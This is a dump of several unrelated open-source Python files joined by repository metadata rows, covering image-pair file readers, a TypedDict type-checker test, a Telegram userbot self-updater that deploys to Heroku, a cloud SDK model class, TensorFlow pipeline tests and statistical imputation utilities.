read a pairs file (csv with 3 fields, name1, name2, score) and return the list of matches
:param pairsfile_path: path to pairsfile
:type pairsfile_path: str
"""
getLogger().info('reading pairs from pairsfile')
if query_records is not None:
query_images = set(query_records.data_list())
else:
query_images = None
if map_records is not None:
map_images = set(map_records.data_list())
else:
map_images = None
image_pairs = []
with open(pairsfile_path, 'r') as fid:
table = table_from_file(fid)
for query_name, map_name, _ in table: # last field score is not used
if query_images is not None and query_name not in query_images:
continue
if map_images is not None and map_name not in map_images:
continue
if query_name != map_name:
image_pairs.append((query_name, map_name) if query_name < map_name else (map_name, query_name))
# remove duplicates without breaking order
image_pairs = list(OrderedDict.fromkeys(image_pairs))
return image_pairs
def get_ordered_pairs_from_file(pairsfile_path: str,
query_records: kapture.RecordsCamera = None,
map_records: kapture.RecordsCamera = None,
topk_override=None) -> Dict[str, List[Tuple[str, float]]]:
"""
read pairfile and return a list of pairs (keep duplicates, order is query, map)
"""
getLogger().info('reading pairs from pairsfile')
if query_records is not None:
query_images = set(query_records.data_list())
else:
query_images = None
if map_records is not None:
map_images = set(map_records.data_list())
else:
map_images = None
image_pairs = {}
with open(pairsfile_path, 'r') as fid:
table = table_from_file(fid)
for query_name, map_name, score in table:
if query_images is not None and query_name not in query_images:
continue
if map_images is not None and map_name not in map_images:
continue
if query_name not in image_pairs:
image_pairs[query_name] = []
image_pairs[query_name].append((map_name, float(score)))
for k in image_pairs.keys():
sorted_by_score = list(sorted(image_pairs[k], key=lambda x: x[1], reverse=True))
if topk_override is not None and topk_override > len(sorted_by_score):
getLogger().debug(f'image {k} has {len(sorted_by_score)} pairs, less than topk={topk_override}')
elif topk_override is not None:
sorted_by_score = sorted_by_score[:topk_override]
image_pairs[k] = sorted_by_score
return image_pairs
| 41.283951
| 111
| 0.650718
|
ff13038786188a421bccf939abca99192e6af3d7
| 188
|
py
|
Python
|
tests/integrations/pytorch_lightning/loggers_test.py
|
allenai/tango
|
80c90caefae4ad1c3f8472718ddada912cd8fcf9
|
[
"Apache-2.0"
] | 52
|
2021-09-24T17:52:34.000Z
|
2022-03-29T22:55:02.000Z
|
tests/integrations/pytorch_lightning/loggers_test.py
|
keppy/tango
|
fbb78935a1c8a88c049e5ace0a2d0c7eeb4c8893
|
[
"Apache-2.0"
] | 90
|
2021-09-29T04:23:29.000Z
|
2022-03-31T21:23:02.000Z
|
tests/integrations/pytorch_lightning/loggers_test.py
|
keppy/tango
|
fbb78935a1c8a88c049e5ace0a2d0c7eeb4c8893
|
[
"Apache-2.0"
] | 8
|
2021-11-13T01:56:22.000Z
|
2022-02-27T03:29:42.000Z
|
from tango.integrations.pytorch_lightning.loggers import LightningLogger
def test_all_loggers_registered():
assert "pytorch_lightning::CSVLogger" in LightningLogger.list_available()
| 31.333333
| 77
| 0.845745
|
a8ffe6570ecaafb2ef7df0f67a991b2f501272f9
| 974
|
py
|
Python
|
packages/pyright-internal/src/tests/samples/function16.py
|
sasano8/pyright
|
e804f324ee5dbd25fd37a258791b3fd944addecd
|
[
"MIT"
] | 4,391
|
2019-05-07T01:18:57.000Z
|
2022-03-31T20:45:44.000Z
|
packages/pyright-internal/src/tests/samples/function16.py
|
sasano8/pyright
|
e804f324ee5dbd25fd37a258791b3fd944addecd
|
[
"MIT"
] | 2,740
|
2019-05-07T03:29:30.000Z
|
2022-03-31T12:57:46.000Z
|
packages/pyright-internal/src/tests/samples/function16.py
|
sasano8/pyright
|
e804f324ee5dbd25fd37a258791b3fd944addecd
|
[
"MIT"
] | 455
|
2019-05-07T12:55:14.000Z
|
2022-03-31T17:09:15.000Z
|
# This sample tests the handling of an unpacked TypedDict passed as
# an argument to a function.
from typing import TypedDict
class TD1(TypedDict):
arg1: int
arg2: str
class TD2(TD1):
arg3: float
def func1(arg1: int, arg2: str):
pass
def func2(arg1: int, arg2: str, arg3: float):
pass
def func3(arg1: int, arg2: str, **kwargs: float):
pass
def func4(arg1: int, arg2: str, **kwargs: int):
pass
td1: TD1 = {"arg1": 10, "arg2": "something"}
td2: TD2 = {"arg1": 10, "arg2": "something", "arg3": 3.4}
func1(**td1)
# This should generate an error because "arg1" is already assigned
func1(arg1=3, **td1)
# This should generate an error because "arg3" isn't provided
func1(**td2)
# This should generate an error because "arg3" isn't matched
func2(**td1)
func2(**td2)
func3(**td1)
func3(**td2)
func4(**td1)
# This should generate an error because "arg3" cannot be matched
# due to the type of the **kwargs parameter.
func4(**td2)
| 16.793103
| 67
| 0.666324
|
e53e90033f79a47b8f0b44c624eb4ddb480798a8
| 7,351
|
py
|
Python
|
userbot/modules/updater.py
|
DazRepo/Uro-bot
|
010825f4f7462fd3d8fbf89085ed1f94ba7d5e67
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/updater.py
|
DazRepo/Uro-bot
|
010825f4f7462fd3d8fbf89085ed1f94ba7d5e67
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/updater.py
|
DazRepo/Uro-bot
|
010825f4f7462fd3d8fbf89085ed1f94ba7d5e67
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
"""
This module updates the userbot based on upstream revision
"""
import asyncio
import sys
from os import environ, execle, remove
from git import Repo
from git.exc import GitCommandError, InvalidGitRepositoryError, NoSuchPathError
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP, HEROKU_API_KEY, HEROKU_APP_NAME, UPSTREAM_REPO_URL, bot
from userbot.events import poci_cmd
async def gen_chlog(repo, diff):
d_form = "%d/%m/%y"
return "".join(
f"• [{c.committed_datetime.strftime(d_form)}]: {c.summary} <{c.author}>\n"
for c in repo.iter_commits(diff)
)
async def print_changelogs(event, ac_br, changelog):
changelog_str = (
f"**✥ Tersedia Pembaruan Untuk [{ac_br}] :\n\n✥ Pembaruan:**\n`{changelog}`"
)
if len(changelog_str) > 4096:
await event.edit("**Changelog terlalu besar, dikirim sebagai file.**")
with open("output.txt", "w+") as file:
file.write(changelog_str)
await event.client.send_file(event.chat_id, "output.txt")
remove("output.txt")
else:
await event.client.send_message(event.chat_id, changelog_str)
return True
async def deploy(event, repo, ups_rem, ac_br, txt):
if HEROKU_API_KEY is not None:
import heroku3
heroku = heroku3.from_key(HEROKU_API_KEY)
heroku_app = None
heroku_applications = heroku.apps()
if HEROKU_APP_NAME is None:
await event.edit(
"**[HEROKU]: Harap Tambahkan Variabel** `HEROKU_APP_NAME` "
" **untuk deploy perubahan terbaru dari Userbot.**"
)
repo.__del__()
return
for app in heroku_applications:
if app.name == HEROKU_APP_NAME:
heroku_app = app
break
if heroku_app is None:
await event.edit(
f"{txt}\n"
"**Kredensial Heroku tidak valid untuk deploy Uro-bot dyno.**"
)
return repo.__del__()
try:
from userbot.modules.sql_helper.globals import addgvar, delgvar
delgvar("restartstatus")
addgvar("restartstatus", f"{event.chat_id}\n{event.id}")
except AttributeError:
pass
ups_rem.fetch(ac_br)
repo.git.reset("--hard", "FETCH_HEAD")
heroku_git_url = heroku_app.git_url.replace(
"https://", "https://api:" + HEROKU_API_KEY + "@"
)
if "heroku" in repo.remotes:
remote = repo.remote("heroku")
remote.set_url(heroku_git_url)
else:
remote = repo.create_remote("heroku", heroku_git_url)
try:
remote.push(refspec="HEAD:refs/heads/master", force=True)
except Exception as error:
await event.edit(f"{txt}\n**Terjadi Kesalahan Di Log:**\n`{error}`")
return repo.__del__()
build = heroku_app.builds(order_by="created_at", sort="desc")[0]
if build.status == "failed":
await event.edit("**Build Gagal!** Dibatalkan karena ada beberapa error.`")
await asyncio.sleep(5)
return await event.delete()
await event.edit(
"`Uro-bot Berhasil Di Deploy! Userbot bisa di gunakan kembali.`"
)
else:
await event.edit("**[HEROKU]: Harap Tambahkan Variabel** `HEROKU_API_KEY`")
await asyncio.sleep(10)
await event.delete()
return
async def update(event, repo, ups_rem, ac_br):
try:
ups_rem.pull(ac_br)
except GitCommandError:
repo.git.reset("--hard", "FETCH_HEAD")
await event.edit("`Uro-bot Berhasil Diupdate! Userbot bisa di Gunakan Lagi.`")
try:
from userbot.modules.sql_helper.globals import addgvar, delgvar
delgvar("restartstatus")
addgvar("restartstatus", f"{event.chat_id}\n{event.id}")
except AttributeError:
pass
# Spin a new instance of bot
args = [sys.executable, "-m", "userbot"]
execle(sys.executable, *args, environ)
@bot.on(poci_cmd(outgoing=True, pattern=r"update( now| deploy|$)"))
async def upstream(event):
"For .update command, check if the bot is up to date, update if specified"
await event.edit("`Mengecek Pembaruan, Tunggu Sebentar...`")
conf = event.pattern_match.group(1).strip()
off_repo = UPSTREAM_REPO_URL
force_update = False
try:
txt = "**Pembaruan Tidak Dapat Di Lanjutkan Karna "
txt += "Terjadi Beberapa ERROR**\n\n**LOGTRACE:**\n"
repo = Repo()
except NoSuchPathError as error:
await event.edit(f"{txt}\n**Directory** `{error}` **Tidak Dapat Di Temukan.**")
return repo.__del__()
except GitCommandError as error:
await event.edit(f"{txt}\n**Kegagalan awal!** `{error}`")
return repo.__del__()
except InvalidGitRepositoryError as error:
if conf is None:
return await event.edit(
f"**Sayangnya, Directory {error} Tampaknya Bukan Dari Repo."
"\nTapi Kita Bisa Memperbarui Paksa Userbot Menggunakan** `.update deploy`"
)
repo = Repo.init()
origin = repo.create_remote("upstream", off_repo)
origin.fetch()
force_update = True
repo.create_head("master", origin.refs.master)
repo.heads.master.set_tracking_branch(origin.refs.master)
repo.heads.master.checkout(True)
ac_br = repo.active_branch.name
try:
repo.create_remote("upstream", off_repo)
except BaseException:
pass
ups_rem = repo.remote("upstream")
ups_rem.fetch(ac_br)
changelog = await gen_chlog(repo, f"HEAD..upstream/{ac_br}")
if conf == "deploy":
await event.edit("`[HEROKU]: Update Deploy ㄩ尺ㄖ 乃ㄖㄒ Sedang Dalam Proses...`")
await deploy(event, repo, ups_rem, ac_br, txt)
return
if changelog == "" and not force_update:
await event.edit("**⚡ ㄩ尺ㄖ 乃ㄖㄒ Sudah Versi Terbaru**")
await asyncio.sleep(15)
await event.delete()
return repo.__del__()
if conf == "" and not force_update:
await print_changelogs(event, ac_br, changelog)
await event.delete()
return await event.respond(
"**Ketik** `.update deploy` **untuk Mengupdate Userbot.**"
)
if force_update:
await event.edit(
"**Sinkronisasi Paksa Ke Kode Userbot Terbaru, Harap Tunggu...**"
)
if conf == "now":
for commit in changelog.splitlines():
if (
commit.startswith("- [NQ]")
and HEROKU_APP_NAME is not None
and HEROKU_API_KEY is not None
):
return await event.edit(
"**Quick update telah dinonaktifkan untuk pembaruan ini; "
"Gunakan** `.update deploy` **sebagai gantinya.**"
)
await event.edit("**Perfoming a quick update, please wait...**")
await update(event, repo, ups_rem, ac_br)
return
CMD_HELP.update(
{
"update": f"**Plugin : **`update`\
\n\n • **Syntax :** `{cmd}update`\
\n • **Function : **Untuk Melihat Pembaruan Terbaru ㄩ尺ㄖ 乃ㄖㄒ.\
\n\n • **Syntax :** `{cmd}update deploy`\
\n • **Function : **Untuk MengUpdate Fitur Terbaru Dari ㄩ尺ㄖ 乃ㄖㄒ.\
"
}
)
| 34.511737
| 91
| 0.600871
|
6ce72ae19420b3a0a63ae59ac57bc51b0c6db8e1
| 4,880
|
py
|
Python
|
huaweicloud-sdk-ivs/huaweicloudsdkivs/v2/model/req_data_by_id_card_image.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-ivs/huaweicloudsdkivs/v2/model/req_data_by_id_card_image.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-ivs/huaweicloudsdkivs/v2/model/req_data_by_id_card_image.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ReqDataByIdCardImage:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'idcard_image1': 'str',
'idcard_image2': 'str',
'face_image': 'str'
}
attribute_map = {
'idcard_image1': 'idcard_image1',
'idcard_image2': 'idcard_image2',
'face_image': 'face_image'
}
def __init__(self, idcard_image1=None, idcard_image2=None, face_image=None):
"""ReqDataByIdCardImage - a model defined in huaweicloud sdk"""
self._idcard_image1 = None
self._idcard_image2 = None
self._face_image = None
self.discriminator = None
self.idcard_image1 = idcard_image1
if idcard_image2 is not None:
self.idcard_image2 = idcard_image2
self.face_image = face_image
@property
def idcard_image1(self):
"""Gets the idcard_image1 of this ReqDataByIdCardImage.
身份证人像面图像数据,使用base64编码,要求base64编码后大小不超过4M。图像各边的像素大小在300到4000之间,支持JPG格式。
:return: The idcard_image1 of this ReqDataByIdCardImage.
:rtype: str
"""
return self._idcard_image1
@idcard_image1.setter
def idcard_image1(self, idcard_image1):
"""Sets the idcard_image1 of this ReqDataByIdCardImage.
身份证人像面图像数据,使用base64编码,要求base64编码后大小不超过4M。图像各边的像素大小在300到4000之间,支持JPG格式。
:param idcard_image1: The idcard_image1 of this ReqDataByIdCardImage.
:type: str
"""
self._idcard_image1 = idcard_image1
@property
def idcard_image2(self):
"""Gets the idcard_image2 of this ReqDataByIdCardImage.
身份证国徽面图像数据,使用base64编码,要求base64编码后大小不超过4M。图像各边的像素大小在300到4000之间,支持JPG格式。
:return: The idcard_image2 of this ReqDataByIdCardImage.
:rtype: str
"""
return self._idcard_image2
@idcard_image2.setter
def idcard_image2(self, idcard_image2):
"""Sets the idcard_image2 of this ReqDataByIdCardImage.
身份证国徽面图像数据,使用base64编码,要求base64编码后大小不超过4M。图像各边的像素大小在300到4000之间,支持JPG格式。
:param idcard_image2: The idcard_image2 of this ReqDataByIdCardImage.
:type: str
"""
self._idcard_image2 = idcard_image2
@property
def face_image(self):
"""Gets the face_image of this ReqDataByIdCardImage.
现场人像图像数据,使用base64编码,要求base64编码后大小不超过4M。图像各边的像素大小在300到4000之间,支持JPG格式。
:return: The face_image of this ReqDataByIdCardImage.
:rtype: str
"""
return self._face_image
@face_image.setter
def face_image(self, face_image):
"""Sets the face_image of this ReqDataByIdCardImage.
现场人像图像数据,使用base64编码,要求base64编码后大小不超过4M。图像各边的像素大小在300到4000之间,支持JPG格式。
:param face_image: The face_image of this ReqDataByIdCardImage.
:type: str
"""
self._face_image = face_image
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReqDataByIdCardImage):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 29.221557
| 80
| 0.608402
|
10c539487b96af6a13903f27fc8edbdc94029828
| 5,435
|
py
|
Python
|
workflow/dags/tasks/preprocess/data_pipeline_utils_test.py
|
isabella232/driblet
|
2d51de919681deca1ca4cb483996c68587fd9ba8
|
[
"Apache-2.0"
] | 22
|
2019-07-09T08:57:37.000Z
|
2021-11-14T18:36:17.000Z
|
workflow/dags/tasks/preprocess/data_pipeline_utils_test.py
|
isabella232/driblet
|
2d51de919681deca1ca4cb483996c68587fd9ba8
|
[
"Apache-2.0"
] | 17
|
2019-12-16T22:01:23.000Z
|
2022-03-01T23:10:23.000Z
|
workflow/dags/tasks/preprocess/data_pipeline_utils_test.py
|
isabella232/driblet
|
2d51de919681deca1ca4cb483996c68587fd9ba8
|
[
"Apache-2.0"
] | 8
|
2019-11-03T20:11:33.000Z
|
2021-09-15T10:01:02.000Z
|
# coding=utf-8
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for data_pipeline_utils."""
import tempfile
import data_pipeline_utils as utils
import mock
import numpy as np
import tensorflow as tf
from tensorflow_metadata.proto.v0 import schema_pb2
from tensorflow_transform import coders as tft_coders
from tensorflow_transform.tf_metadata import dataset_schema
from google.protobuf import text_format
_TEST_SCHEMA = b"""
feature {
name: "id_col"
value_count {
min: 1
max: 1
}
type: INT
presence {
min_fraction: 1.0
min_count: 1
}
}
feature {
name: "cat_col1"
value_count {
min: 1
max: 1
}
type: BYTES
presence {
min_fraction: 1.0
min_count: 1
}
}
feature {
name: "num_col1"
value_count {
min: 1
max: 1
}
type: FLOAT
presence {
min_count: 1
}
}
"""
class DataPipelineUtilsTest(tf.test.TestCase):
def setUp(self):
super(DataPipelineUtilsTest, self).setUp()
self._schema = schema_pb2.Schema()
text_format.Parse(_TEST_SCHEMA, self._schema)
def test_make_transformed_key(self):
input_key = 'key'
expected_key = 'tr_key'
self.assertEqual(utils.make_transformed_key(input_key), expected_key)
def test_get_transformed_keys(self):
input_keys = ['key1', 'key2']
expected_keys = ['tr_key1', 'tr_key2']
self.assertListEqual(utils.get_transformed_keys(input_keys), expected_keys)
def test_get_raw_feature_spec_train_mode(self):
expected = {
u'cat_col1': tf.VarLenFeature(dtype=tf.string),
u'id_col': tf.VarLenFeature(dtype=tf.int64),
u'num_col1': tf.VarLenFeature(dtype=tf.float32)
}
actual = utils.get_raw_feature_spec(self._schema,
tf.estimator.ModeKeys.TRAIN)
self.assertDictEqual(actual, expected)
@mock.patch('data_pipeline_utils.features_config')
def test_get_raw_feature_spec_predict_mode(self, feature_config):
feature_config.TARGET_FEATURE = 'num_col1'
expected = {
u'cat_col1': tf.VarLenFeature(dtype=tf.string),
u'id_col': tf.VarLenFeature(dtype=tf.int64)
}
actual = utils.get_raw_feature_spec(self._schema,
tf.estimator.ModeKeys.PREDICT)
self.assertDictEqual(actual, expected)
def test_make_dataset_schema(self):
generated_dataset_schema = utils.make_dataset_schema(
self._schema, tf.estimator.ModeKeys.TRAIN)
self.assertIsInstance(generated_dataset_schema, dataset_schema.Schema)
def test_read_schema(self):
temp_schema_file = tempfile.NamedTemporaryFile(
dir=tempfile.mkdtemp(), delete=False)
temp_schema_file.write(_TEST_SCHEMA)
temp_schema_file.close()
expected_schema = schema_pb2.Schema()
text_format.Parse(_TEST_SCHEMA, expected_schema)
actual_schema = utils.read_schema(temp_schema_file.name)
self.assertEqual(actual_schema, expected_schema)
@mock.patch('data_pipeline_utils.features_config')
def test_make_csv_coder_train_mode(self, feature_config):
feature_config.TARGET_FEATURE = 'num_col1'
feature_config.ALL_FEATURES = ['id_col', 'cat_col1', 'num_col1']
# Assert that generated csv_coder is instance of tft_coders.CsvCoder.
csv_coder = utils.make_csv_coder(self._schema, tf.estimator.ModeKeys.TRAIN)
self.assertIsInstance(csv_coder, tft_coders.CsvCoder)
# Assert that csv_coder contains all feature columns.
expected_columns = feature_config.ALL_FEATURES
self.assertListEqual(csv_coder._column_names, expected_columns)
@mock.patch('data_pipeline_utils.features_config')
def test_make_csv_coder_predict_mode(self, feature_config):
feature_config.TARGET_FEATURE = 'num_col1'
feature_config.ALL_FEATURES = ['id_col', 'cat_col1', 'num_col1']
expected_columns = ['id_col', 'cat_col1']
csv_coder = utils.make_csv_coder(self._schema,
tf.estimator.ModeKeys.PREDICT)
# Assert that target column is removed from csv_coder column_names.
self.assertListEqual(csv_coder._column_names, expected_columns)
def test_replace_missing_values(self):
a = tf.constant([1.0], dtype=tf.float32)
b = tf.constant(['Test'], dtype=tf.string)
indices = [[0, 0]]
shape = [1, 1]
input_tensors = [
tf.SparseTensor(indices=indices, values=a, dense_shape=shape),
tf.SparseTensor(indices=indices, values=b, dense_shape=shape)
]
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
actual = [
sess.run(utils.replace_missing_values(tensor))
for tensor in input_tensors
]
expected = [
np.array([1.0], dtype=np.float32),
np.array([b'Test'], dtype=np.object)
]
self.assertListEqual(actual, expected)
if __name__ == '__main__':
tf.test.main()
| 31.783626
| 79
| 0.702484
|
2da953e587edb271e3d1bac9f36606b1a459fd33
| 2,044
|
py
|
Python
|
src/scripts/NormWavepacket.py
|
WaveBlocks/WaveBlocks
|
2af3730dcf27e54006ec602e696b4d4df25459d8
|
[
"BSD-3-Clause"
] | null | null | null |
src/scripts/NormWavepacket.py
|
WaveBlocks/WaveBlocks
|
2af3730dcf27e54006ec602e696b4d4df25459d8
|
[
"BSD-3-Clause"
] | null | null | null |
src/scripts/NormWavepacket.py
|
WaveBlocks/WaveBlocks
|
2af3730dcf27e54006ec602e696b4d4df25459d8
|
[
"BSD-3-Clause"
] | null | null | null |
"""The WaveBlocks Project
Compute the norms of the homogeneous wavepackets as well as the sum of all norms.
@author: R. Bourquin
@copyright: Copyright (C) 2010, 2011 R. Bourquin
@license: Modified BSD License
"""
from WaveBlocks import PotentialFactory
from WaveBlocks import HagedornWavepacket
def compute_norm(iom, blockid=0):
"""Compute the norm of a wavepacket timeseries.
:param iom: An ``IOManager`` instance providing the simulation data.
:param blockid: The data block from which the values are read.
"""
parameters = iom.load_parameters()
# Number of time steps we saved
timesteps = iom.load_wavepacket_timegrid(blockid=blockid)
nrtimesteps = timesteps.shape[0]
Potential = PotentialFactory().create_potential(parameters)
# Retrieve simulation data
params = iom.load_wavepacket_parameters(blockid=blockid)
coeffs = iom.load_wavepacket_coefficients(blockid=blockid)
# A data transformation needed by API specification
coeffs = [ [ coeffs[i,j,:] for j in xrange(parameters["ncomponents"]) ] for i in xrange(nrtimesteps)]
# We want to save norms, thus add a data slot to the data file
iom.add_norm(parameters, timeslots=nrtimesteps, blockid=blockid)
# Hack for allowing data blocks with different basis size than the global one
# todo: remove when we got local parameter sets
parameters.update_parameters({"basis_size": coeffs[0][0].shape[0]})
# Initialize a Hagedorn wavepacket with the data
HAWP = HagedornWavepacket(parameters)
HAWP.set_quadrature(None)
# Iterate over all timesteps
for i, step in enumerate(timesteps):
print(" Computing norms of timestep "+str(step))
# Configure the wave packet and project to the eigenbasis.
HAWP.set_parameters(params[i])
HAWP.set_coefficients(coeffs[i])
HAWP.project_to_eigen(Potential)
# Measure norms in the eigenbasis
norm = HAWP.get_norm()
# Save the norms
iom.save_norm(norm, timestep=step, blockid=blockid)
| 34.644068
| 105
| 0.720646
|
bb5614548721dbd02b47d773b87b828f419beb5a
| 30,511
|
py
|
Python
|
pred_diff/imputers/impute.py
|
PredDiff/PredDiffTabular
|
ae116c5179615d8163c1421e1feb7dcfbd1c2b5e
|
[
"BSD-3-Clause"
] | 1
|
2021-05-04T15:09:25.000Z
|
2021-05-04T15:09:25.000Z
|
pred_diff/imputers/impute.py
|
PredDiff/PredDiffTabular
|
ae116c5179615d8163c1421e1feb7dcfbd1c2b5e
|
[
"BSD-3-Clause"
] | null | null | null |
pred_diff/imputers/impute.py
|
PredDiff/PredDiffTabular
|
ae116c5179615d8163c1421e1feb7dcfbd1c2b5e
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import pandas as pd
import scipy
import scipy.stats as st
from typing import List, Union
from tqdm.auto import tqdm
from sklearn.experimental import enable_iterative_imputer # noqa
from sklearn.impute import IterativeImputer as IterativeImputerOriginal
from .IterativeImputerPR import IterativeImputer as IterativeImputerPR
from ..tools.utils_bootstrap import empirical_bootstrap
# from ..tools.bootstrap_utils import empirical_bootstrap
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier, ExtraTreesRegressor, ExtraTreesClassifier
from sklearn.preprocessing import StandardScaler, RobustScaler, OrdinalEncoder, OneHotEncoder
from sklearn.dummy import DummyClassifier, DummyRegressor
##########################################################################################
#EVALUATION
##########################################################################################
def _eval_mean(predictions, weights=None, log_transform=False, n_train_samples=10000, n_classes = 10):
if(weights is None):
mean = predictions.mean(axis=1)
else:
mean = np.sum(predictions*weights, axis=1)/np.sum(weights, axis=1)
return mean
def evaluate_imputer(df,x,imputer_name=None,n_bootstrap=100,verbose=False):
'''evaluates imputers based on metrics from https://stefvanbuuren.name/fimd/sec-evaluation.html and some basic statistical tests
Parameters:
df: original dataframe
x: result of applying imputer to df
'''
res = []
for xi in x:
cols = [a for a in xi.columns if a not in ['id','imputation_id','sampling_prob']]
for c in cols:
imputations = np.stack(list(xi.groupby('id')[c].apply(lambda y: np.array(y))),axis=0)#n_samples,n_imputations
if("sampling_prob" in xi.columns):
sampling_probs =np.stack(list(xi.groupby('id')["sampling_prob"].apply(lambda y: np.array(y))),axis=0)
else:
sampling_probs = None
ground_truth = np.array(df[c])
mean_pred, bounds_low, bounds_high, _ = empirical_bootstrap(imputations if sampling_probs is None else (imputations,sampling_probs), _eval_mean, n_iterations=n_bootstrap)
raw_bias = np.abs(mean_pred- ground_truth)
percentage_bias = np.mean(np.abs(raw_bias/(ground_truth+1e-8)))
raw_bias = np.mean(raw_bias)
if(verbose):
print("\n\nimputed cols:",cols," var:",c,"dtype:",df[c].dtype)
print("for reference: mean",np.mean(ground_truth),"std",np.std(ground_truth))
print("mean raw bias:",np.mean(raw_bias))
print("mean percentage bias:",np.mean(percentage_bias))
#print(bounds_low[:3],bounds_high[:3],mean_pred[:3],ground_truth[:3])
coverage_rate = np.mean(np.logical_and(bounds_low <= ground_truth, ground_truth <= bounds_high))
average_width = np.mean(bounds_high-bounds_low)
rmse = np.sqrt(np.mean(np.power(ground_truth-mean_pred,2)))
try:
mwu = st.mannwhitneyu(ground_truth,mean_pred).pvalue #low p value: reject H0 that both are sampled from the same distribution
except:
mwu = np.nan #all identical
try:
wc= st.wilcoxon(ground_truth,mean_pred).pvalue
except:
wc = np.nan #Wilcoxon pvalue could not be calculated due to constant predictions
if(verbose):
print("coverage rate:",coverage_rate)
print("average width:",average_width)
print("rmse:",rmse)
print("Mann Whitney U pvalue:", mwu)
print("Wilcoxon pvalue:",wc)
res.append({"imputed_cols":cols,"var":c,"dtype":df[c].dtype,"gt_mean":np.mean(ground_truth),"gt_std":np.std(ground_truth),"pred_mean":np.mean(mean_pred),"pred_std":np.std(mean_pred),"raw_bias":raw_bias,"percentage_bias":percentage_bias,"coverage_rate":coverage_rate,"average_width":average_width,"rmse":rmse,"mann-whitney_u_p":mwu,"wilcoxon_p":wc})
df=pd.DataFrame(res)
if(imputer_name is not None):
df["imputer"]=imputer_name
return df
##########################################################################################
# RFxxxSampling/ETxxxSampling
##########################################################################################
class RandomForestRegressorSampling(RandomForestRegressor):
'''RandomForestRegressor that samples from a Gaussian distribution based on mean/std of trees'''
def predict(self, X):
#possibility to speed this up by mimicing the original predict #https://stackoverflow.com/questions/20615750/how-do-i-output-the-regression-prediction-from-each-tree-in-a-random-forest-in-p?rq=1
per_tree_pred = [tree.predict(X) for tree in self.estimators_]
sample_mean = np.mean(per_tree_pred,axis=0)
sample_std = np.std(per_tree_pred,axis=0)
return sample_mean+sample_std* np.random.randn(len(X))
class RandomForestClassifierSampling(RandomForestClassifier):
'''RandomForestClassifier that samples from the predict_proba multinomial distribution'''
def predict(self, X):
probs = self.predict_proba(X)
return np.array([np.where(np.random.multinomial(1, ps))[0] for ps in probs]).astype(np.int64)
class ExtraTreesRegressorSampling(ExtraTreesRegressor):
'''ExtraTreesRegressor that samples from a Gaussian distribution based on mean/std of trees'''
def predict(self, X):
#possibility to speed this up by mimicing the original predict #https://stackoverflow.com/questions/20615750/how-do-i-output-the-regression-prediction-from-each-tree-in-a-random-forest-in-p?rq=1
per_tree_pred = [tree.predict(X) for tree in self.estimators_]
sample_mean = np.mean(per_tree_pred,axis=0)
sample_std = np.std(per_tree_pred,axis=0)
return sample_mean+sample_std* np.random.randn(len(X))
class ExtraTreesClassifierSampling(ExtraTreesClassifier):
'''RandomForestClassifier that samples from the predict_proba multinomial distribution'''
def predict(self, X):
probs = self.predict_proba(X)
return np.array([np.where(np.random.multinomial(1, ps))[0] for ps in probs]).astype(np.int64)
#########################################################################################
# Imputer Baseclass
#########################################################################################
class ImputerBase(object):
'''Imputer Base class; takes care of label encoding, standard scaling'''
def __init__(self, df_train, **kwargs):
self.df_train = df_train.copy()
self.kwargs = kwargs
self.exclude_cols = self.kwargs["exclude_cols"] if "exclude_cols" in self.kwargs.keys() else []
self.nocat_cols = self.kwargs["nocat_cols"] if "nocat_cols" in self.kwargs.keys() else []
#label-encode by default
label_encode = self.kwargs["label_encode"] if "label_encode" in self.kwargs.keys() else True
standard_scale = self.kwargs["standard_scale"] if "standard_scale" in self.kwargs.keys() else False
standard_scale_all = self.kwargs["standard_scale_all"] if "standard_scale_all" in self.kwargs.keys() else False
